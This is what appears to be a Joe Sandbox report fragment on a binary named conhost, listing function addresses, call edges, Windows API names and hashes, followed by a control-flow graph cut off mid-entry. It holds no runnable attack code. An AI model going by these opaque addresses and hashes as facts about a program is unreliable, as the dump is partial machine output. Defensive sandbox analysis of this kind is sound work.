3971->3976 3972->3956 3977 7ff6b1a2557a GetLastError 3972->3977 3973 7ff6b1a254b1 3973->3952 3974->3972 3975->3953 3976->3966 3977->3956 3978->3797 3980 7ff6b1a23ded 3979->3980 3980->3802 3982 7ff6b1a25420 19 API calls 3981->3982 3983 7ff6b1a22c42 3982->3983 3984 7ff6b1a25420 19 API calls 3983->3984 3985 7ff6b1a22c51 3984->3985 4063 7ff6b1a23420 wcslen 3985->4063 3988 7ff6b1a25420 19 API calls 3989 7ff6b1a22cdf 3988->3989 3990 7ff6b1a22d90 3989->3990 3991 7ff6b1a22cf2 3989->3991 3992 7ff6b1a25420 19 API calls 3990->3992 3993 7ff6b1a25420 19 API calls 3991->3993 3994 7ff6b1a22d95 memcpy 3992->3994 3995 7ff6b1a22cf7 3993->3995 3994->3995 3996 7ff6b1a22b30 34 API calls 3995->3996 3997 7ff6b1a22d52 3996->3997 3998 7ff6b1a23680 23 API calls 3997->3998 3999 7ff6b1a22d5f 3998->3999 4068 7ff6b1a23940 3999->4068 4001 7ff6b1a22d6a 4002 7ff6b1a22d7b 4001->4002 4003 7ff6b1a25420 19 API calls 4001->4003 4002->3852 4004 7ff6b1a22df8 4003->4004 4005 7ff6b1a25420 19 API calls 4004->4005 4006 7ff6b1a22e07 4005->4006 4007 7ff6b1a22e5f wcsstr 4006->4007 4008 7ff6b1a22e6f 4007->4008 4009 7ff6b1a22e84 4007->4009 4008->3852 4010 7ff6b1a25420 19 API calls 4009->4010 4011 7ff6b1a22eb0 4010->4011 4012 7ff6b1a25420 19 API calls 4011->4012 4013 7ff6b1a22ebf 4012->4013 4014 7ff6b1a22f17 wcsstr 4013->4014 4014->4008 4015 7ff6b1a22f2b 4014->4015 4016 7ff6b1a25420 19 API calls 4015->4016 4017 7ff6b1a22f37 4016->4017 4018 7ff6b1a25420 19 API calls 4017->4018 4019 7ff6b1a22f46 4018->4019 4020 7ff6b1a22f94 wcsstr 4019->4020 4020->4008 4021 7ff6b1a22fa8 4020->4021 4022 7ff6b1a25420 19 API calls 4021->4022 4023 7ff6b1a22fb4 4022->4023 4024 7ff6b1a25420 19 API calls 4023->4024 4025 7ff6b1a22fc3 4024->4025 4026 7ff6b1a23011 wcsstr 4025->4026 4026->4008 4027 7ff6b1a23025 4026->4027 4028 7ff6b1a25420 19 API calls 4027->4028 4029 7ff6b1a2306b 4028->4029 4030 7ff6b1a25420 19 API calls 4029->4030 4032 7ff6b1a2307a 4030->4032 4031 7ff6b1a230de wcsstr 4031->4002 4032->4031 4032->4032 4034 7ff6b1a23260 23 API calls 4033->4034 4035 7ff6b1a236bc 4034->4035 4035->3887 4037 7ff6b1a23117 memset wcscpy wcslen 4036->4037 4038 7ff6b1a231a6 4036->4038 4037->4038 4038->3887 4077 7ff6b1a25290 4039->4077 4043 7ff6b1a22b80 4086 7ff6b1a222e0 4043->4086 4045 7ff6b1a22ba3 4045->3873 4047 7ff6b1a23420 26 API calls 4046->4047 4048 7ff6b1a23849 4047->4048 4049 7ff6b1a23260 23 API calls 4048->4049 4050 7ff6b1a23873 4049->4050 4050->3885 4052 7ff6b1a25337 malloc 4051->4052 4053 7ff6b1a25370 malloc 4051->4053 4054 7ff6b1a25345 4052->4054 4055 7ff6b1a253b2 abort 4052->4055 4053->4054 4053->4055 4056 7ff6b1a25358 memcpy 4054->4056 4057 7ff6b1a2539a memset 4054->4057 4056->3973 4057->3973 4059 7ff6b1a25410 GetLastError 4058->4059 4060 7ff6b1a253f3 4058->4060 4059->4060 4061 7ff6b1a25418 abort 4060->4061 4062 7ff6b1a2540b 4060->4062 4062->3966 4067 7ff6b1a23450 4063->4067 4064 7ff6b1a2346e memset wcscpy 4071 7ff6b1a23260 memset 4064->4071 4066 7ff6b1a22cb9 memcpy 4066->3988 4067->4064 4067->4066 4069 7ff6b1a23260 23 API calls 4068->4069 4070 7ff6b1a23969 4069->4070 4070->4001 4072 7ff6b1a25420 19 API calls 4071->4072 4073 7ff6b1a232af 4072->4073 4074 7ff6b1a25420 19 API calls 4073->4074 4075 7ff6b1a232be 4074->4075 4076 7ff6b1a23311 wcscpy wcscat wcslen 4075->4076 4076->4067 4078 7ff6b1a22b40 memset 4077->4078 4079 7ff6b1a256b0 4078->4079 4080 7ff6b1a256be 4079->4080 4081 7ff6b1a25700 4079->4081 4106 7ff6b1a27060 4080->4106 4083 7ff6b1a27060 2 API calls 4081->4083 4085 7ff6b1a25715 4083->4085 4084 7ff6b1a256d7 4084->4043 4085->4043 4087 7ff6b1a222f6 4086->4087 4093 7ff6b1a25420 19 API calls 4087->4093 4098 7ff6b1a22a4e wcsncmp 4087->4098 4101 7ff6b1a22395 4087->4101 4088 7ff6b1a223ce memset 4089 7ff6b1a25420 19 API calls 4088->4089 4090 7ff6b1a22415 4089->4090 4091 7ff6b1a228c8 4090->4091 4092 7ff6b1a22428 4090->4092 4095 7ff6b1a25420 19 API calls 4091->4095 4094 7ff6b1a25420 19 API calls 4092->4094 4093->4087 4096 7ff6b1a2242d 4094->4096 4099 7ff6b1a228cd 4095->4099 4097 7ff6b1a2245b wcslen 4096->4097 4097->4099 4100 7ff6b1a2246f memset wcscpy wcslen 4097->4100 4098->4087 4098->4101 4102 7ff6b1a2292e 4099->4102 4103 7ff6b1a224be memset wcscpy wcslen 4099->4103 4100->4102 4100->4103 4101->4088 4104 7ff6b1a224f2 wcslen wcslen wcslen 4102->4104 4103->4104 4105 7ff6b1a225b0 4104->4105 4105->4045 4107 7ff6b1a27092 4106->4107 4108 7ff6b1a2711e 4107->4108 4111 7ff6b1a25a30 2 API calls 4107->4111 4113 7ff6b1a271cd 4107->4113 4109 7ff6b1a2713f 4108->4109 4115 7ff6b1a25a30 4108->4115 4109->4084 4111->4107 4112 7ff6b1a25a30 2 API calls 4112->4113 4113->4112 4114 7ff6b1a277d0 4113->4114 4114->4084 4116 7ff6b1a25a4a 4115->4116 4117 7ff6b1a25b5a fwprintf 4116->4117 4118 7ff6b1a25b91 fwprintf 4116->4118 4119 7ff6b1a25a6d 4116->4119 4117->4119 4118->4119 4119->4109 4224 7ff6b1a23ee0 4225 7ff6b1a23ee9 4224->4225 4226 7ff6b1a23eed 4225->4226 4229 7ff6b1a24a70 4225->4229 4228 7ff6b1a23f05 4230 7ff6b1a24b15 4229->4230 4233 7ff6b1a24a7e 4229->4233 4231 7ff6b1a24b1f 4230->4231 4232 7ff6b1a24b50 InitializeCriticalSection 4230->4232 4231->4228 4232->4231 4234 7ff6b1a24a82 4233->4234 4235 7ff6b1a24af1 DeleteCriticalSection 4233->4235 4236 7ff6b1a24ae0 free 4233->4236 4234->4228 4235->4234 4236->4235 4236->4236 4247 7ff6b1a29fd0 4248 7ff6b1a296f0 6 API calls 4247->4248 4249 7ff6b1a29fec 4248->4249 4253 7ff6b1a249d0 4254 7ff6b1a249e1 4253->4254 4255 7ff6b1a249f0 EnterCriticalSection 4253->4255 4256 7ff6b1a24a23 LeaveCriticalSection 4255->4256 4258 7ff6b1a24a09 4255->4258 4257 7ff6b1a24a30 4256->4257 4258->4256 4260 7ff6b1a24a0f free LeaveCriticalSection 4258->4260 4260->4257 4264 7ff6b1a24d50 4265 7ff6b1a24d67 4264->4265 4266 7ff6b1a24de5 4264->4266 4267 7ff6b1a24d91 calloc 4265->4267 4267->4266 4268 7ff6b1a24da8 EnterCriticalSection LeaveCriticalSection 4267->4268 4273 7ff6b1a27441 4274 7ff6b1a274f4 4273->4274 4276 7ff6b1a27468 4273->4276 4277 7ff6b1a27af5 4274->4277 4278 7ff6b1a27969 4274->4278 4276->4277 4276->4278 4279 7ff6b1a27b77 4276->4279 4284 7ff6b1a26780 4276->4284 4281 7ff6b1a25910 8 API calls 4277->4281 4289 7ff6b1a25910 4278->4289 4282 7ff6b1a25910 8 API calls 4279->4282 4281->4279 4283 7ff6b1a27ba4 4282->4283 4283->4283 4286 7ff6b1a2679f 4284->4286 4285 7ff6b1a268a6 4285->4274 4286->4285 4288 7ff6b1a25a30 2 API calls 4286->4288 4293 7ff6b1a259b0 4286->4293 4288->4286 4290 7ff6b1a25924 4289->4290 4290->4290 4297 7ff6b1a25780 4290->4297 4292 7ff6b1a2595e 4292->4278 4294 7ff6b1a259e0 4293->4294 4296 7ff6b1a259bf 4293->4296 4295 7ff6b1a2a3a0 4 API calls 4294->4295 4295->4296 4296->4286 4298 7ff6b1a2579c 4297->4298 4299 7ff6b1a258a5 4297->4299 4298->4299 4308 7ff6b1a257bf 4298->4308 4300 7ff6b1a258b8 4299->4300 4301 7ff6b1a258ea fwprintf 4299->4301 4303 7ff6b1a258fe fwprintf 4300->4303 4304 7ff6b1a258c5 fwprintf 4300->4304 4302 7ff6b1a258d1 4301->4302 4302->4292 4303->4302 4304->4302 4305 7ff6b1a257d9 4305->4292 4306 7ff6b1a257fb strlen 4307 7ff6b1a2a3a0 4 API calls 4306->4307 4307->4308 4308->4305 4308->4306 4309 7ff6b1a27ec0 4310 7ff6b1a27be0 6 API calls 4309->4310 4311 7ff6b1a27ea1 4310->4311 4312 7ff6b1a276c0 4313 7ff6b1a276d7 4312->4313 4314 7ff6b1a25a30 2 API calls 4313->4314 4315 7ff6b1a276f8 4314->4315 4327 7ff6b1a24945 4328 7ff6b1a24969 4327->4328 4329 7ff6b1a24974 calloc 4327->4329 4329->4328 4330 7ff6b1a2498b EnterCriticalSection LeaveCriticalSection 4329->4330 4331 7ff6b1a275a7 4332 7ff6b1a275e1 4331->4332 4333 7ff6b1a275ce 4331->4333 4335 7ff6b1a26610 17 API calls 4332->4335 4337 7ff6b1a26610 4333->4337 4336 7ff6b1a278e8 4335->4336 4336->4336 4338 7ff6b1a26629 4337->4338 4339 7ff6b1a26734 4338->4339 4340 7ff6b1a26664 4338->4340 4341 7ff6b1a25910 8 API calls 4339->4341 4342 7ff6b1a266d0 4340->4342 4346 7ff6b1a26678 4340->4346 4343 7ff6b1a26743 4341->4343 4344 7ff6b1a266df 4342->4344 4345 7ff6b1a266d4 strlen 4342->4345 4349 7ff6b1a27c70 5 API calls 4343->4349 4374 7ff6b1a26490 4344->4374 4345->4344 4347 7ff6b1a26680 4346->4347 4348 7ff6b1a26754 strlen 4346->4348 4359 7ff6b1a25bb0 4347->4359 4348->4347 4350 7ff6b1a2674b 4349->4350 4350->4332 4354 7ff6b1a26697 4368 7ff6b1a27c70 4354->4368 4360 7ff6b1a25bd2 4359->4360 4361 7ff6b1a25d62 4360->4361 4362 7ff6b1a25c4b 4360->4362 4364 7ff6b1a25e60 4360->4364 4363 7ff6b1a259b0 4 API calls 4361->4363 4366 7ff6b1a25d81 4361->4366 4362->4361 4367 7ff6b1a25a30 2 API calls 4362->4367 4363->4366 4365 7ff6b1a259b0 4 API calls 4364->4365 4364->4366 4365->4366 4366->4354 4367->4362 4370 7ff6b1a297f0 4368->4370 4369 7ff6b1a266c2 4369->4332 4370->4369 4371 7ff6b1a295d0 4 API calls 4370->4371 4372 7ff6b1a29817 4371->4372 4372->4369 4373 7ff6b1a29840 LeaveCriticalSection 4372->4373 4375 7ff6b1a264c6 4374->4375 4376 7ff6b1a25bb0 6 API calls 4375->4376 4377 7ff6b1a26531 4376->4377 4378 7ff6b1a2a729 GetLastError 4379 7ff6b1a2762d 4380 7ff6b1a27636 4379->4380 4381 7ff6b1a25f90 strlen 4380->4381 4382 7ff6b1a27641 4381->4382 4382->4382 4383 7ff6b1a2a6b1 VirtualQuery 4384 7ff6b1a24f30 4385 7ff6b1a24f3f 4384->4385 4386 7ff6b1a24fae 4385->4386 4387 7ff6b1a24f99 strncmp 4385->4387 4387->4385 4387->4386 4388 7ff6b1a24bb0 4389 7ff6b1a24bbd 4388->4389 4390 7ff6b1a24c00 4388->4390 4391 7ff6b1a24bc1 4389->4391 4392 7ff6b1a24c20 4389->4392 4393 7ff6b1a24c0e 4390->4393 4394 7ff6b1a24ca0 InitializeCriticalSection TlsAlloc 4390->4394 4395 7ff6b1a24bc6 TlsGetValue 4391->4395 4396 7ff6b1a24bf3 4391->4396 4397 7ff6b1a24c2c 4392->4397 4398 7ff6b1a24c50 TlsGetValue 4392->4398 4394->4393 4399 7ff6b1a24b70 free 4395->4399 4397->4396 4400 7ff6b1a24c35 DeleteCriticalSection 4397->4400 4401 7ff6b1a24b70 free 4398->4401 4402 7ff6b1a24be1 TlsSetValue 4399->4402 4400->4396 4403 7ff6b1a24c6b TlsSetValue 4401->4403 4402->4396 4404 7ff6b1a24b70 free 4403->4404 4405 7ff6b1a24c88 TlsFree 4404->4405 4405->4397 4406 7ff6b1a27318 4407 7ff6b1a27324 4406->4407 4408 7ff6b1a27a1f wcslen 4407->4408 4409 7ff6b1a2734c 4407->4409 4410 7ff6b1a25a30 2 API calls 4409->4410 4411 7ff6b1a27364 4410->4411 4412 7ff6b1a2a520 ___mb_cur_max_func ___lc_codepage_func 4413 7ff6b1a2a230 4 API calls 4412->4413 4414 7ff6b1a2a56d 4413->4414 4415 7ff6b1a296a0 4416 7ff6b1a296c0 DeleteCriticalSection 4415->4416 4417 7ff6b1a296b5 4415->4417 4418 7ff6b1a2721e 4419 7ff6b1a276d7 4418->4419 4420 7ff6b1a2724d 4418->4420 4421 7ff6b1a25a30 2 API calls 4419->4421 4422 7ff6b1a25780 8 API calls 4420->4422 4423 7ff6b1a276f8 4421->4423 4424 7ff6b1a27263 4422->4424 4424->4419 4425 7ff6b1a27214 4424->4425 4426 7ff6b1a2734c 4425->4426 4427 7ff6b1a27a1f wcslen 4425->4427 4428 7ff6b1a25a30 2 API calls 4426->4428 4429 7ff6b1a27364 4428->4429 4430 7ff6b1a2769e 4431 7ff6b1a25a30 2 API calls 4430->4431 4432 7ff6b1a276bb 4431->4432 4432->4432 4433 7ff6b1a27f20 4434 7ff6b1a27f29 4433->4434 4435 7ff6b1a296f0 6 API calls 4434->4435 4436 7ff6b1a27f3e 4435->4436 4437 7ff6b1a27e70 4436->4437 4443 7ff6b1a27fdf 4436->4443 4438 7ff6b1a297f0 5 API calls 4437->4438 4439 7ff6b1a27e78 4438->4439 4440 7ff6b1a27be0 6 API calls 4439->4440 4441 7ff6b1a27ea0 4440->4441 4442 7ff6b1a283e9 4443->4442 4445 7ff6b1a281b0 4443->4445 4446 7ff6b1a28401 4443->4446 4466 7ff6b1a281ef 4443->4466 4444 7ff6b1a27bb0 6 API calls 4444->4466 4468 7ff6b1a27bb0 4445->4468 4446->4444 4446->4466 4448 7ff6b1a288f0 4449 7ff6b1a297f0 5 API calls 4450 7ff6b1a286b4 4449->4450 4452 7ff6b1a283a0 4450->4452 4453 7ff6b1a297f0 5 API calls 4450->4453 4451 7ff6b1a297f0 5 API calls 4451->4441 4452->4451 4453->4452 4454 7ff6b1a29920 6 API calls 4454->4466 4455 7ff6b1a29c10 7 API calls 4455->4466 4456 7ff6b1a29a80 10 API calls 4456->4466 4457 7ff6b1a29860 8 API calls 4457->4466 4459 7ff6b1a28651 4459->4448 4476 7ff6b1a29860 4459->4476 4461 7ff6b1a296f0 6 API calls 4462 7ff6b1a29186 memcpy 4461->4462 4490 7ff6b1a29c10 4462->4490 4464 7ff6b1a2866d 4464->4448 4464->4449 4466->4448 4466->4452 4466->4454 4466->4455 4466->4456 4466->4457 4466->4459 4466->4461 4466->4464 4467 7ff6b1a297f0 Sleep InitializeCriticalSection InitializeCriticalSection EnterCriticalSection LeaveCriticalSection 4466->4467 4472 7ff6b1a29950 4466->4472 4483 7ff6b1a29d40 4466->4483 4467->4466 4469 7ff6b1a27bbc 4468->4469 4470 7ff6b1a296f0 6 API calls 4469->4470 4471 7ff6b1a27bd4 4470->4471 4471->4466 4473 7ff6b1a29971 4472->4473 4474 7ff6b1a296f0 6 API calls 4473->4474 4475 7ff6b1a29997 4474->4475 4475->4466 4477 7ff6b1a29880 4476->4477 4478 7ff6b1a298ab 4477->4478 4479 7ff6b1a296f0 6 API calls 4477->4479 4478->4464 4480 7ff6b1a298db 4479->4480 4480->4478 4481 7ff6b1a298e3 memcpy 4480->4481 4482 7ff6b1a297f0 5 API calls 4481->4482 4482->4478 4484 7ff6b1a29d5d 4483->4484 4485 7ff6b1a29d8b 4483->4485 4484->4485 4487 7ff6b1a29e90 4484->4487 4486 7ff6b1a296f0 6 API calls 4485->4486 4489 7ff6b1a29d99 4486->4489 4488 7ff6b1a296f0 6 API calls 4487->4488 4488->4489 4489->4466 4491 7ff6b1a29c3f 4490->4491 4492 7ff6b1a296f0 6 API calls 4491->4492 4495 7ff6b1a29c4e 4492->4495 4493 7ff6b1a29ce0 4493->4466 4494 7ff6b1a297f0 5 API calls 4494->4493 4495->4493 4495->4494 4501 7ff6b1a23fa0 4502 7ff6b1a23fbf 4501->4502 4503 7ff6b1a23ff6 fprintf 4502->4503 4504 7ff6b1a2a688 wcscat 4505 7ff6b1a3240c 4504->4505 4506 7ff6b1a2a410 ___lc_codepage_func ___mb_cur_max_func 4507 7ff6b1a2a451 4506->4507 4512 7ff6b1a2a469 4506->4512 4508 7ff6b1a2a462 4507->4508 4511 7ff6b1a2a4d0 4507->4511 4507->4512 4509 7ff6b1a2a230 4 API calls 4508->4509 4508->4512 4509->4508 4510 7ff6b1a2a230 4 API calls 4510->4511 4511->4510 4511->4512 4513 7ff6b1a23f10 4514 7ff6b1a23f22 4513->4514 4515 7ff6b1a23f32 4514->4515 4516 7ff6b1a24a70 3 API calls 4514->4516 4517 7ff6b1a23f77 4516->4517 4518 7ff6b1a21010 4519 7ff6b1a2104b 4518->4519 4520 7ff6b1a2106d __set_app_type 4519->4520 4521 7ff6b1a21077 4519->4521 4520->4521 4522 7ff6b1a274f9 4523 7ff6b1a27520 4522->4523 4527 7ff6b1a27533 4522->4527 4528 7ff6b1a26570 4523->4528 4524 7ff6b1a26570 15 API calls 4526 7ff6b1a278c9 4524->4526 4526->4526 4527->4524 4529 7ff6b1a26584 4528->4529 4530 7ff6b1a265bb 4529->4530 4531 7ff6b1a265f0 4529->4531 4533 7ff6b1a26490 6 API calls 4530->4533 4532 7ff6b1a25910 8 API calls 4531->4532 4534 7ff6b1a265ff 4532->4534 4535 7ff6b1a265ca 4533->4535 4536 7ff6b1a27c70 5 API calls 4534->4536 4537 7ff6b1a27c70 5 API calls 4535->4537 4538 7ff6b1a26607 4536->4538 4539 7ff6b1a265d2 4537->4539 4538->4527 4539->4527 4540 7ff6b1a2a701 MultiByteToWideChar 4545 7ff6b1a21500 4546 7ff6b1a21180 85 API calls 4545->4546 4547 7ff6b1a21516 4546->4547 4548 7ff6b1a24e00 4549 7ff6b1a24e17 4548->4549 4550 7ff6b1a24e90 4548->4550 4551 7ff6b1a24e41 calloc 4549->4551 4552 7ff6b1a24e28 _assert 4549->4552 4551->4550 4553 7ff6b1a24e58 TlsGetValue TlsSetValue 4551->4553 4552->4551 4554 7ff6b1a23200 wcscpy wcslen 4555 7ff6b1a2322d 4554->4555 4559 7ff6b1a23380 4560 7ff6b1a23260 23 API calls 4559->4560 4561 7ff6b1a233b2 4560->4561 4562 7ff6b1a27284 4563 7ff6b1a272ab 4562->4563 4564 7ff6b1a27890 4562->4564 4573 7ff6b1a260e0 4563->4573 4566 7ff6b1a260e0 15 API calls 4564->4566 4567 7ff6b1a278aa 4566->4567 4567->4567 4568 7ff6b1a27214 4569 7ff6b1a2734c 4568->4569 4570 7ff6b1a27a1f wcslen 4568->4570 4571 7ff6b1a25a30 2 API calls 4569->4571 4572 7ff6b1a27364 4571->4572 4574 7ff6b1a260f4 4573->4574 4575 7ff6b1a26170 4574->4575 4576 7ff6b1a26134 4574->4576 4577 7ff6b1a25910 8 API calls 4575->4577 4578 7ff6b1a25bb0 6 API calls 4576->4578 4579 7ff6b1a2617f 4577->4579 4580 7ff6b1a26143 4578->4580 4581 7ff6b1a27c70 5 API calls 4579->4581 4583 7ff6b1a27c70 5 API calls 4580->4583 4582 7ff6b1a26187 4581->4582 4582->4568 4584 7ff6b1a26167 4583->4584 4584->4568

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 0 7ff6b1a21560-7ff6b1a21629 call 7ff6b1a25290 call 7ff6b1a2a650 call 7ff6b1a25420 * 2 9 7ff6b1a2162b-7ff6b1a2164a call 7ff6b1a24b60 0->9 10 7ff6b1a2164f-7ff6b1a21655 0->10 9->10 12 7ff6b1a21657-7ff6b1a21661 10->12 13 7ff6b1a21688-7ff6b1a2176d wcscpy wcslen call 7ff6b1a23dde memset call 7ff6b1a25420 10->13 14 7ff6b1a21663-7ff6b1a21680 12->14 20 7ff6b1a2179f-7ff6b1a217ae call 7ff6b1a25420 13->20 21 7ff6b1a2176f-7ff6b1a2179a call 7ff6b1a25420 call 7ff6b1a24b60 13->21 14->14 16 7ff6b1a21682 14->16 16->13 27 7ff6b1a217d7-7ff6b1a21826 call 7ff6b1a25420 * 2 20->27 28 7ff6b1a217b0-7ff6b1a217d3 20->28 21->20 33 7ff6b1a21828-7ff6b1a2184d call 7ff6b1a24b60 27->33 34 7ff6b1a21852-7ff6b1a21856 27->34 28->27 33->34 36 7ff6b1a21858-7ff6b1a2187e 34->36 37 7ff6b1a21884-7ff6b1a218f9 _wgetenv call 7ff6b1a231d0 memset call 7ff6b1a25420 * 2 34->37 36->37 44 7ff6b1a218fb-7ff6b1a2191e call 7ff6b1a24b60 37->44 45 7ff6b1a21923-7ff6b1a21928 37->45 44->45 47 7ff6b1a2192a-7ff6b1a2194e 45->47 48 7ff6b1a21952-7ff6b1a21a03 call 7ff6b1a231d0 memset call 7ff6b1a25420 45->48 47->48 53 7ff6b1a21a37-7ff6b1a21a46 call 7ff6b1a25420 48->53 54 7ff6b1a21a05-7ff6b1a21a32 call 7ff6b1a25420 call 7ff6b1a24b60 48->54 60 7ff6b1a21a78-7ff6b1a21ae5 call 7ff6b1a231d0 memset call 7ff6b1a25420 53->60 61 7ff6b1a21a48-7ff6b1a21a52 53->61 54->53 68 7ff6b1a21ae7-7ff6b1a21b13 call 7ff6b1a25420 call 7ff6b1a24b60 60->68 69 7ff6b1a21b18-7ff6b1a21b27 call 7ff6b1a25420 60->69 62 7ff6b1a21a54-7ff6b1a21a71 61->62 62->62 64 7ff6b1a21a73 62->64 64->60 68->69 75 7ff6b1a21b57-7ff6b1a21bab call 7ff6b1a25420 * 2 69->75 76 7ff6b1a21b29-7ff6b1a21b33 69->76 83 7ff6b1a21bad-7ff6b1a21bd0 call 7ff6b1a24b60 75->83 84 7ff6b1a21bd5-7ff6b1a21bda 75->84 77 7ff6b1a21b35-7ff6b1a21b51 76->77 77->77 79 7ff6b1a21b53 77->79 79->75 83->84 85 7ff6b1a21c07-7ff6b1a21c87 _wgetenv call 7ff6b1a231d0 memset call 7ff6b1a25420 * 2 84->85 86 7ff6b1a21bdc-7ff6b1a21c00 84->86 94 7ff6b1a21c89-7ff6b1a21cac call 7ff6b1a24b60 85->94 95 7ff6b1a21cb1-7ff6b1a21cb6 85->95 86->85 94->95 97 7ff6b1a21cb8-7ff6b1a21cdc 95->97 98 7ff6b1a21ce4-7ff6b1a21d39 call 7ff6b1a25420 * 2 95->98 97->98 103 7ff6b1a21d6b-7ff6b1a21d6f 98->103 104 7ff6b1a21d3b-7ff6b1a21d66 call 7ff6b1a24b60 98->104 106 7ff6b1a21d9a-7ff6b1a21dda _wgetenv call 7ff6b1a231d0 call 7ff6b1a22bf0 call 7ff6b1a25420 103->106 107 7ff6b1a21d71-7ff6b1a21d94 103->107 104->103 115 7ff6b1a21e0a-7ff6b1a21e19 call 7ff6b1a25420 106->115 116 7ff6b1a21ddc-7ff6b1a21e05 call 7ff6b1a25420 call 7ff6b1a24b60 106->116 107->106 122 7ff6b1a21e1b-7ff6b1a21e2f 115->122 123 7ff6b1a21e33-7ff6b1a21eaf call 7ff6b1a25420 * 2 115->123 116->115 122->123 128 7ff6b1a21eda-7ff6b1a21ede 123->128 129 7ff6b1a21eb1-7ff6b1a21ed5 call 7ff6b1a24b60 123->129 131 7ff6b1a21f0f-7ff6b1a21f6e call 7ff6b1a23680 128->131 132 7ff6b1a21ee0-7ff6b1a21eea 128->132 129->128 137 7ff6b1a21f73-7ff6b1a21f9f call 7ff6b1a23d7e call 7ff6b1a25420 * 2 131->137 134 7ff6b1a21eec-7ff6b1a21f09 132->134 134->134 136 7ff6b1a21f0b 134->136 136->131 144 7ff6b1a21fbb-7ff6b1a21fc0 137->144 145 7ff6b1a21fa1-7ff6b1a21fb6 call 7ff6b1a24b60 137->145 147 7ff6b1a21fc2-7ff6b1a21fd0 144->147 148 7ff6b1a21fd5-7ff6b1a21fe2 _wcsicmp 144->148 145->144 147->148 149 7ff6b1a22008-7ff6b1a2200b call 7ff6b1a23100 148->149 150 7ff6b1a21fe4-7ff6b1a21fe7 148->150 154 7ff6b1a22010-7ff6b1a22012 149->154 150->149 151 7ff6b1a21fe9-7ff6b1a21fec call 7ff6b1a23980 150->151 155 7ff6b1a21ff1-7ff6b1a21ff3 151->155 154->151 156 7ff6b1a22014-7ff6b1a2201f call 7ff6b1a23980 154->156 155->137 157 7ff6b1a21ff9-7ff6b1a21fff 155->157 159 7ff6b1a22022-7ff6b1a22061 memcpy call 7ff6b1a25420 * 2 156->159 157->159 165 7ff6b1a22096-7ff6b1a2209e 159->165 166 7ff6b1a22063-7ff6b1a22091 memcpy call 7ff6b1a24b60 159->166 168 7ff6b1a220d0-7ff6b1a22115 call 7ff6b1a22b30 memcpy call 7ff6b1a25420 165->168 169 7ff6b1a220a0 165->169 166->165 176 7ff6b1a2226b-7ff6b1a222b2 call 7ff6b1a25420 memcpy call 7ff6b1a24b60 168->176 177 7ff6b1a2211b-7ff6b1a22132 call 7ff6b1a25420 168->177 170 7ff6b1a220a2-7ff6b1a220c6 169->170 170->170 172 7ff6b1a220c8 170->172 172->168 190 7ff6b1a222b7-7ff6b1a222c7 call 7ff6b1a23830 176->190 183 7ff6b1a22166-7ff6b1a22197 call 7ff6b1a22b30 177->183 184 7ff6b1a22134 177->184 183->190 191 7ff6b1a2219d-7ff6b1a221d6 memcpy call 7ff6b1a25420 * 2 183->191 187 7ff6b1a22136-7ff6b1a2215c 184->187 187->187 189 7ff6b1a2215e 187->189 189->183 195 7ff6b1a222cc 190->195 198 7ff6b1a22206-7ff6b1a2220e 191->198 199 7ff6b1a221d8-7ff6b1a22201 memcpy call 7ff6b1a24b60 191->199 195->195 201 7ff6b1a22210 198->201 202 7ff6b1a22242-7ff6b1a22266 call 7ff6b1a22b30 198->202 199->198 203 7ff6b1a22212-7ff6b1a22238 201->203 202->137 203->203 206 7ff6b1a2223a 203->206 206->202
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000001C.00000002.2615765463.00007FF6B1A21000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6B1A20000, based on PE: true
                                                                                                              • Associated: 0000001C.00000002.2615735917.00007FF6B1A20000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615796164.00007FF6B1A2B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615824283.00007FF6B1A2E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615842564.00007FF6B1A31000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615869918.00007FF6B1A35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_28_2_7ff6b1a20000_conhost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memset$_wgetenvmemcpy$_wcsicmpwcscpywcslen
                                                                                                              • String ID: 0
                                                                                                              • API String ID: 1664775652-4108050209
                                                                                                              • Opcode ID: 3a1534b5e3ca9a8a8a2e0385ce873c7f0a8f16c935b960f04ff68599d2e2cc95
                                                                                                              • Instruction ID: 9c28a925fbd97803ee0a9ccfd42a74c53d3b4785752d212c7ca228dc9938e519
                                                                                                              • Opcode Fuzzy Hash: 3a1534b5e3ca9a8a8a2e0385ce873c7f0a8f16c935b960f04ff68599d2e2cc95
                                                                                                              • Instruction Fuzzy Hash: 6F729221A086C5A5FB21DB2AE4153BA6BA1FF95788F404036DB4C87B96EF7DF144C780

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 207 7ff6b1a222e0-7ff6b1a2238f call 7ff6b1a25290 call 7ff6b1a23df9 call 7ff6b1a23d54 214 7ff6b1a22940-7ff6b1a22958 call 7ff6b1a23df9 207->214 215 7ff6b1a22395-7ff6b1a223a1 207->215 219 7ff6b1a2295d-7ff6b1a2295f 214->219 217 7ff6b1a223a9-7ff6b1a22422 call 7ff6b1a23da8 memset call 7ff6b1a25420 215->217 227 7ff6b1a228c8-7ff6b1a228ff call 7ff6b1a25420 call 7ff6b1a24b60 217->227 228 7ff6b1a22428-7ff6b1a22434 call 7ff6b1a25420 217->228 219->215 221 7ff6b1a22965-7ff6b1a22990 219->221 223 7ff6b1a229b1-7ff6b1a229c2 221->223 225 7ff6b1a22998-7ff6b1a2299c 223->225 226 7ff6b1a229c4-7ff6b1a229ee call 7ff6b1a25420 * 2 223->226 229 7ff6b1a22b10-7ff6b1a22b20 225->229 230 7ff6b1a229a2-7ff6b1a229ab 225->230 244 7ff6b1a229f0-7ff6b1a22a1f call 7ff6b1a24b60 226->244 245 7ff6b1a22a24-7ff6b1a22a28 226->245 251 7ff6b1a22908-7ff6b1a22928 227->251 238 7ff6b1a22436-7ff6b1a22447 228->238 239 7ff6b1a2244d-7ff6b1a22469 call 7ff6b1a231d0 wcslen 228->239 229->215 230->223 230->229 238->239 239->251 252 